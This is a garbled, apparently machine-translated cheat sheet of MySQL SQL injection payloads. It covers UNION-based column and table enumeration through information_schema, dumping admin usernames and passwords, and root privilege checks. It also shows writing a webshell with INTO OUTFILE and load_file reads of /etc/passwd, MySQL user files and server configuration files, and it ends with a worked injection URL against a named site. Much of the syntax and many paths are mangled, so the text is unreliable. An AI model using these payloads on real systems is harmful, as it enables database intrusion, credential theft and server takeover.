MYSQL injection statement _ MySQL

Andord (mid (version (),) 51 explanation 1: confirm that the database version 51 is ASCII code 3 is correct. if the 40 is incorrect, and ord (mid (version (), 1, 1)> 51

Interpretation 1: confirm that the database version 51 is ASCII code 3 is correct. if the version is greater than 4.0, the union method can be used;

Interpretation 2: ord () is a mysql function used to obtain binary code;

Explanation 3: mid () is a mysql function used for bitwise operations;

Interpretation 4: version () is a mysql function used to obtain the current database version;

Union select, 1, ***

Description: This function is used to test the number of fields returned by the current SQL query results;

Order by 13

Explanation: sorting is performed based on the number of fields in the query results to test the number of fields returned by the current SQL query.

Union select, ***, 13 from admin

Explanation: If the returned result is correct, the admin table name exists.

Union select 1, version (), 3, *** 13 from admin

Explanation: violent database version

Union select 1, username, 3, *** 13 from admin

Explanation: violent account/password

Union select 1, username, 3, *** 13 from admin where id = 2

Explanation: The first user primary key in the violent admin table is ID.

And ord (mid (user (), 1, 1) = 144

Explanation: Determine whether the ROOT permission returns a correct existence

And 1 = 1 union select 1, 2, 4, 5 ....... N

Explanation: matching fields

And 1 = 2 union select 1, 2, 3, 4, 5 ..... N

Explanation: Violent field location

Version () database () user ()

Explanation: using built-in function brute-force database information

You do not need to guess the available field brute-force database information (some websites are not applicable ):

And 1 = 2 union all select version ()

And 1 = 2 union all select database ()

And 1 = 2 union all select user ()

And 1 = 2 union all select @ global. version_compile_ OS from mysql. user

Explanation: getting Operating System Information:

And ord (mid (user (), 1, 1) = 114

Explanation: obtain the database permission. if the returned result is normal, it indicates the root permission.

And 1 = 2 union select 1, 2, 3, SCHEMA_NAME, 5, 6, 7, 8, 9, 10 from information_schema.SCHEMATA limit 0, 1

Explanation: database violence (mysql> 5.0) Mysql 5 and above have a built-in database information_schema, which stores all the database and table structure information of mysql.

And 1 = 2 union select 1, 2, 3, TABLE_NAME, 5, 6, 7, 8, 9, 10 from information_schema.TABLES where TABLE_SCHEMA = database (hexadecimal) limit 0 (start record, 0 indicates the first start record), 1 (1 record is displayed)

Explanation: table guessing

And 1 = 2 Union select 1, 2, 3, COLUMN_NAME, 5, 6, 7, 8, 9, 10 from information_schema.COLUMNS where TABLE_NAME = table name (hexadecimal) limit 0, 1

Explanation: guess fields

And 1 = 2 Union select 1, 2, 3, username segment, 5, 6, 7, password segment, 8, 9 from table name limit 0, 1

Explanation: brute force password

Union select 1, 2, 3 concat (username segment, 0x3c, password segment), 5, 6, 7, 8, 9 from table name limit 0, 1

Explanation: Advanced usage (one available field displays two data contents)

Write horse directly (Root permission)

Condition 1: Know the physical path of the site

Condition 2: you have sufficient permissions (you can use select .... From mysql. user test)

Condition 3: magic_quotes_gpc () = OFF Select' 'Into outfile' physical path 'and 1 = 2 union all select statement HEX value into outfile' path'

Load_file () common paths:

Replace (load_file (0 × 2F6574632F706173737764), 0 × 3c, 0 × 20)

Replace (load_file (char (47,101,116, 115,115,119,100,), char (60), char (32 ))

Explanation: The above two shows the code completely displayed in a php file. sometimes some characters are not replaced. for example, if "<" is replaced with "space", the webpage is returned, and the code cannot be viewed.

Load_file (char (47 ))

Explanation: The root directories of FreeBSD and Sunos systems can be listed.

/Etc tpd/conf tpd. conf or/usr/local/apche/conf tpd. conf

Explanation: view the configuration file of the linux APACHE virtual host.

C: \ Program Files \ Apache Group \ Apache \ conf \ httpd. conf or C: \ apache \ conf \ httpd. conf

Explanation: View apache files in WINDOWS

C:/Resin-3.0.14/conf/resin. conf

Explanation: view the website resin file configuration developed by jsp

C:/Resin/conf/resin. conf/usr/local/resin/conf/resin. conf

Explanation: View JSP virtual hosts configured in linux

D: \ APACHE \ Apache2 \ conf \ httpd. conf

C: \ Program Files \ mysql \ my. ini

../Themes/darkblue_orange/layout. inc. php phpmyadmin

Explanation: explosive path

C: \ windows \ system32 \ inetsrv \ MetaBase. xml

Explanation: view the virtual host configuration file of IIS

/Usr/local/resin-3.0.22/conf/resin. conf

Explanation: view the RESIN configuration file for 3.0.22

/Usr/local/resin-pro-3.0.22/conf/resin. conf is the same as above

/Usr/local/app/apache2/conf/extra tpd-vhosts.conf apashe vm view

/Etc/sysconfig/iptables

Explanation: This document describes the firewall policies.

Usr/local/app/php5 B/php. ini

Explanation: PHP equivalent settings

/Etc/my. cnf

Explanation: MYSQL configuration file

/Etc/redhat-release

Explanation: Red Hat System version

C: \ mysql \ data \ mysql \ user. MYD

Explanation: user password in MYSQL

/Etc/sysconfig/network-scripts/ifcfg-eth0

Explanation: View IP addresses

/Usr/local/app/php5 B/php. ini

Explanation: PHP settings

/Usr/local/app/apache2/conf/extra tpd-vhosts.conf

Explanation: Virtual website settings

C: \ Program Files \ RhinoSoft.com \ Serv-U \ ServUDaemon. ini

C: \ windows \ my. ini

C: \ boot. ini

Common website configuration files: config. inc. php and config. php. Replace (load_file (HEX), char (60), char (32) must be used for load_file ))

Note: Char (60) indicates <, Char (32) indicates space

Problems with manual injection:

After the injection, the page displays: Illegal mix of collations (latin1_swedish_ci, IMPLICIT) and (utf8_general_ci, IMPLICIT) for operation 'Union'

Such as: http://www.www.myhack58.com/mse/research/instrument.php? ID = 13% 20and % 201 = 2% 20 union % 20 select % 201, load_file (0x433A5C626F6F742E696E69), 3,4, user () % 20, which is caused by inconsistent front and back encoding, solution: add unhex (hex (parameter) before the parameter. The above URL can be changed to: http://www.www.myhack58.com/mse/research/instrument.php? ID = 13% 20and % 201 = 2% 20 union % 20 select % 201, unhex (hex (load_file (0x433A5C626F6F742E696E69), 3,4, unhex (hex (user ())) % 20. you can continue the injection.